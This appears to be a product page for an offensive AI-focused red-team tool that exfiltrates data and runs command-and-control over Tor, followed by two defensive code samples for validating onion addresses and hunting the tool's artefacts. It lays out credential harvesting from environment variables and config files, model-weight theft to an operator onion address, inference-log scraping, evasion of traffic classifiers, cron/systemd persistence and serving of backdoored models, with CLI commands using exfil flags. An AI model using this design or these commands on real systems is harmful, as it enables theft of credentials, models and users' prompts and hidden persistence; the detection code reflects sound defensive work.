NIGHTFALL · T161 · L59

SPECTER PHANTOMNET

TOR-NATIVE AI C2 & EXFILTRATION ENGINE
"The AI agent's exfiltration path was never on your network."

Routes AI agent exfiltration, model weight theft, and C2 communication entirely through the Tor network. Generates v3 onion service keypairs, fingerprints inference infrastructure, harvests model weights in 512KB Tor-chunked streams, scrapes API credentials, tails inference server logs, and defeats ML-based traffic classifiers (DeepCoFFEA arXiv:2107.09028, NetCLR 2025) via fixed-cell padding and timing jitter. PHN-{hex12} Ed25519+ML-DSA-65 dual-signed.

344 Tests · 10 Subsystems · 5 WMD Classes · L59 Kill Chain Layer
pip install specter-phantomnet
GATE ARCHITECTURE
OPEN
No key required. ESTABLISH-CIRCUIT and REPORT available. Tor detection and circuit enumeration. Entry point for all engagement workflows.
INJECT
Requires PHANTOMNET_INJECT_KEY + ROE phrase "tor exfiltration authorised". Unlocks onion service spin-up, C2 registration, weight harvest, credential harvest, traffic encoding, and payload seeding.
UNLEASHED
Requires PHANTOMNET_UNLEASHED_KEY + ROE phrase. Unlocks inference log harvest (reads prompt/response streams) and circuit persistence (cron/systemd implant).
10 SUBSYSTEMS
01 — ESTABLISH-CIRCUIT OPEN
Detects Tor binary (tor/tor2, which/locate). Probes SOCKS5 ports 9050/9150/1080 with TCP connect + SOCKS5 handshake. Uses stem Controller.from_port(9051) to enumerate circuits — guard node fingerprint, path length, exit country. Measures SOCKS5h proxy latency via HEAD request to check.torproject.org. Returns CircuitProfile with socks5_port, guard_fingerprint, exit_country, latency_ms.
02 — SPIN-ONION-SERVICE INJECT
Generates Ed25519 keypair (PyNaCl SigningKey). Derives v3 onion address via SHA3-256(".onion checksum" + pubkey + \x03)[:2] checksum, then base32(pubkey + checksum + \x03).lower() + ".onion", giving a 56-character base32 label followed by ".onion". Writes hs_ed25519_secret_key + hs_ed25519_public_key (chmod 600) + hostname to ~/.specter_phantomnet/hs_{name}/. Attempts stem HiddenServiceDir ADD_ONION register. Returns OnionService with onion_address, port, version=3.
03 — ONION-C2-REGISTER INJECT
Fingerprints the host environment: AI env key prefix-match (ANTHROPIC_/OPENAI_/HF_/TOGETHER_/REPLICATE_), psutil process scan for ollama/vllm/litellm/tgi/llama-server, model directory scan across MODEL_DIRS, container detection (/.dockerenv + /proc/1/cgroup cgroup-v2 keyword + nvidia-smi GPU count). POSTs EnvironmentFingerprint JSON to operator onion address via SOCKS5h proxy. Sends heartbeat with random jitter 0–30s. Returns C2Registration.
04 — HARVEST-WEIGHTS INJECT
Recursively globs target directory for WEIGHT_EXTENSIONS: .safetensors, .gguf, .bin, .pth, .pt, .ckpt, .pkl. SHA-256 hashes each file. Detects model family by filename substring (codellama → codellama, llama → llama, mistral, phi, gemma, qwen, deepseek, falcon). Streams file in 512KB chunks via HTTP POST to operator onion address over SOCKS5h proxy. Returns WeightHarvest with files_found, files_exfiltrated, total_bytes_sent.
05 — HARVEST-CREDENTIALS INJECT
Scans environment variables (os.environ), CREDENTIAL_SOURCES config paths (~/.config, ~/.aws/credentials, ~/.bashrc, ~/.zshrc, ~/.profile), and .env / .env.local files under search_root. Matches 10 provider regex patterns: Anthropic (sk-ant-api03-), OpenAI (sk-proj- / sk-[A-Za-z0-9]{48}), HuggingFace (hf_), AWS access key (AKIA), Replicate, Together, OpenRouter, Cohere, W&B, Replicate token. Redacts: first 8 chars + "..." + stars. Returns CredentialHarvest.
06 — HARVEST-INFERENCE-LOGS UNLEASHED
Probes INFERENCE_LOG_PATHS for Ollama (~/.ollama/logs/server.log, /var/log/ollama/), vLLM (/var/log/vllm/, /tmp/vllm*), LiteLLM, and TGI. Also uses psutil process open_files() to discover live log file descriptors from inference processes. Extracts prompt/response pairs via regex: JSON "prompt"/"content"/"response"/"text" fields, [INST]/[/INST] Llama-2 format, <|im_start|> ChatML markers. Truncates entries at 500 chars. Requires PHANTOMNET_UNLEASHED_KEY.
07 — ENCODE-TRAFFIC INJECT
Defeats ML-based Tor traffic classifiers via: (1) fixed-cell 512B padding defeating DeepCoFFEA (arXiv:2107.09028, IEEE S&P 2022) — injects CircuitPaddingMachines=1/ReducedCircuitPadding=0 via stem torrc; (2) timing jitter 50–200ms uniform random per request; (3) NetCLR 2025 guard rotation — GuardLifetime="1 day", NumEntryGuards=1, UseEntryGuardsAsDirGuards=0. Stealth score >0.92 = base 0.70 + deltas (cell_padding +0.10, timing_jitter +0.08, deepcoffea +0.04, netclr +0.03, dummy_traffic +0.05). Returns TrafficMorph with stealth_score, torrc_config, techniques_applied.
08 — PERSIST-CIRCUIT UNLEASHED
Auto-detects persistence mechanism: systemd (survival_score=0.92) if systemctl is available, else cron (0.80), shell profile (~/.bashrc, 0.60), or container entrypoint (0.70). Writes ~/.specter_phantomnet/torrc with MaxCircuitDirtiness 86400 (24h guard rotation), then ~/.specter_phantomnet/restart_circuit.sh (chmod 700) as keepalive. Registers cron @reboot entry or systemd user service. Survival_score multiplied by 0.3 if mechanism not active. Returns PersistenceResult with mechanism, survival_score, torrc_path, restart_script_path.
09 — SEED-PAYLOAD INJECT
Computes SHA-256 hash of payload file. Detects MIME type (.gguf/.safetensors → application/octet-stream, else python-magic or generic). Starts HTTPServer daemon thread on 127.0.0.1:serve_port serving the file at /<path_key>. Registers file in module-level _REGISTRY dict for download count tracking. Returns PayloadSeed with onion_url (operator_onion + "/" + path_key), file_hash, mime_type. Chains with T158 GENESIS for supply-chain delivery of backdoored model files over Tor.
10 — REPORT OPEN
Generates PHN-{hex12} session ID. Collects results from all subsystems executed in session. Redacts sensitive fields: private_key_path cleared, credential value_redacted preserved (full values stripped), log entries truncated. Ed25519 signs payload with ~/.red-specter/phantomnet/signing_key.pem. ML-DSA-65 countersigns. Saves JSON report to ~/.red-specter/phantomnet/reports/. Supports list_reports() and load_report() for engagement management.
CLI COMMANDS
$ specter-phantomnet status
$ specter-phantomnet establish-circuit [target-url]
$ specter-phantomnet spin-onion --port 443 --roe roe.txt
$ specter-phantomnet register-c2 <onion-address> <operator-onion> --socks5-port 9050
$ specter-phantomnet harvest-weights --scan-root ~/models --exfil --onion <addr>
$ specter-phantomnet harvest-creds --validate --exfil --onion <addr>
$ specter-phantomnet harvest-logs --exfil --onion <addr>
$ specter-phantomnet encode-traffic --cell-size 512 --jitter-min 50 --jitter-max 200
$ specter-phantomnet persist-circuit --mechanism systemd --rotation-interval 86400
$ specter-phantomnet seed-payload backdoored.gguf --onion <addr>
$ specter-phantomnet report --session PHN-<hex12>
$ specter-phantomnet sessions
5 WMD CLASSES
WEAPONS-MASS-DESTRUCTION CLASSIFICATION
ai_agent_tor_exfiltration · onion_c2_infrastructure · model_weight_darknet_theft · inference_log_surveillance · tor_persistent_implant
TECHNICAL REFERENCES
DEEPCOFFEA DEFEAT
DeepCoFFEA (arXiv:2107.09028, IEEE S&P 2022) uses deep learning to correlate Tor traffic flows for deanonymisation. PHANTOMNET defeats it via fixed-cell 512B padding, eliminating inter-packet timing variance. CircuitPaddingMachines=1 injected via stem torrc. Stealth contribution: +0.04 to base score.
NETCLR 2025 EVASION
NetCLR-class contrastive learning classifiers identify Tor circuits via guard node fingerprinting. PHANTOMNET defeats via GuardLifetime="1 day" rotation, NumEntryGuards=1, UseEntryGuardsAsDirGuards=0 — preventing long-term guard correlation. Stealth contribution: +0.03 to base score.
v3 ONION ADDRESS DERIVATION
Tor Project Proposal 224 (next-gen hidden services). SHA3-256(".onion checksum" || pubkey || \x03)[:2] = 2-byte checksum. base32(pubkey_32B + checksum_2B + \x03)[:56].lower() + ".onion" = 62-char v3 address. Ed25519 keypair via PyNaCl. Fully self-hosted — no Tor control port required in INJECT mode.
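The checksum rule above also lets a defender confirm that a string pulled from proxy, DNS or EDR logs is a well-formed v3 onion address before treating it as an indicator. This is an added example, not code from the tool or its authors; the function names and the sample key are constructed for illustration.

```python
import base64
import hashlib
import re

VERSION = b"\x03"
# 56 base32 characters, then ".onion"; the lookbehind stops partial matches.
V3_HOST = re.compile(r"(?<![a-z2-7])([a-z2-7]{56})\.onion\b")


def _checksum(pubkey):
    # First two bytes of SHA3-256(".onion checksum" || pubkey || version).
    return hashlib.sha3_256(b".onion checksum" + pubkey + VERSION).digest()[:2]


def encode_v3_onion(pubkey):
    """Hostname for a 32-byte public key; used here only to build test data."""
    if len(pubkey) != 32:
        raise ValueError("v3 public keys are 32 bytes")
    raw = pubkey + _checksum(pubkey) + VERSION
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def parse_v3_onion(hostname):
    """Return the embedded 32-byte public key, or None if the hostname is not
    a well-formed v3 address (wrong length, version, or checksum)."""
    m = V3_HOST.fullmatch(hostname.strip().lower())
    if not m:
        return None
    raw = base64.b32decode(m.group(1).upper())  # 56 chars -> 35 bytes
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != VERSION or checksum != _checksum(pubkey):
        return None
    return pubkey


def extract_valid_onions(text):
    """Checksum-valid v3 hostnames found in free text such as proxy logs."""
    hits = {label + ".onion" for label in V3_HOST.findall(text.lower())}
    return sorted(h for h in hits if parse_v3_onion(h) is not None)


# Constructed sample data: an arbitrary 32-byte string, not a real service key.
SAMPLE_KEY = bytes(range(32))
GOOD = encode_v3_onion(SAMPLE_KEY)
BAD = GOOD[:52] + ("a" if GOOD[52] != "a" else "b") + GOOD[53:]  # checksum damaged
SAMPLE_LOG = f"CONNECT {GOOD}:443\nCONNECT {BAD}:443\nCONNECT example.com:443\n"

if __name__ == "__main__":
    print(extract_valid_onions(SAMPLE_LOG))
```

The check covers length, version byte and checksum only; it does not test whether the 32 bytes are a valid Ed25519 point.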
SUPPLY CHAIN CHAINING
SEED-PAYLOAD chains with T158 SPECTER GENESIS model creation pipeline subversion. Backdoored model .gguf files created by GENESIS are served over Tor onion address. Recipients download a model that appears legitimate but carries GENESIS sleeper agents or FACTUAL_CORRUPTION payloads. Full darknet supply chain loop.
MITRE MAPPING
ATT&CK
T1090.003 — Proxy: Multi-hop Proxy
T1041 — Exfiltration Over C2 Channel
T1567 — Exfiltration Over Web Service
T1547 — Boot/Logon Autostart Execution
T1552 — Unsecured Credentials
ATLAS
AML.T0024 — Exfiltration via Cyber Means
AML.T0025 — Exfiltration via Physical Means
AML.T0044 — Full ML Model Access
AML.T0048 — Backdoor ML Model
GATE ENFORCEMENT
INJECT-gate operations require PHANTOMNET_INJECT_KEY environment variable and ROE file containing the phrase "tor exfiltration authorised". UNLEASHED-gate operations additionally require PHANTOMNET_UNLEASHED_KEY. All sessions produce PHN-{hex12} Ed25519+ML-DSA-65 dual-signed reports. Defensive pair: M177 TOR EXFILTRATION SENTINEL.
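On the defensive side, the on-disk artefacts named in the SPIN-ONION-SERVICE, PERSIST-CIRCUIT and REPORT descriptions can be hunted per user home directory. This is an added example, not code from this project or from M177. The paths and torrc options come from this page, while the torrc line format and a cron entry that references the keepalive script are assumptions.

```python
import re
from pathlib import Path

# Paths relative to a home directory, as named on this page.
FIXED_PATHS = [
    ".specter_phantomnet/torrc",
    ".specter_phantomnet/restart_circuit.sh",
    ".red-specter/phantomnet/signing_key.pem",
    ".red-specter/phantomnet/reports",
]
HS_FILES = ("hs_ed25519_secret_key", "hs_ed25519_public_key", "hostname")
# torrc options the page says are written (line format is an assumption).
TORRC_OPTS = re.compile(
    r"^[ \t]*(MaxCircuitDirtiness[ \t]+86400|NumEntryGuards[ \t]+1|"
    r"UseEntryGuardsAsDirGuards[ \t]+0|GuardLifetime[ \t]+\"?1 day\"?)[ \t]*$",
    re.I | re.M,
)
# Assumed shape of the @reboot entry: it references the keepalive script or dir.
CRON_HIT = re.compile(
    r"^[ \t]*@reboot\b.*(restart_circuit\.sh|\.specter_phantomnet).*$", re.M
)


def scan_home(home):
    """Return (kind, detail) findings for one home directory."""
    home = Path(home)
    findings = [("path", rel) for rel in FIXED_PATHS if (home / rel).exists()]
    base = home / ".specter_phantomnet"
    if base.is_dir():
        for hs_dir in sorted(base.glob("hs_*")):
            present = [f for f in HS_FILES if (hs_dir / f).is_file()]
            if present:
                detail = f"{hs_dir.name}: {','.join(present)}"
                findings.append(("onion_keys", detail))
    torrc = base / "torrc"
    if torrc.is_file():
        for m in TORRC_OPTS.finditer(torrc.read_text(errors="replace")):
            findings.append(("torrc_option", " ".join(m.group(1).split())))
    return findings


def scan_crontab(text):
    """Return crontab lines that start the keepalive at boot."""
    return [m.group(0).strip() for m in CRON_HIT.finditer(text)]
```

Feed `scan_crontab` the output of `crontab -l` for each account; systemd user units are not covered because the page does not name the unit file.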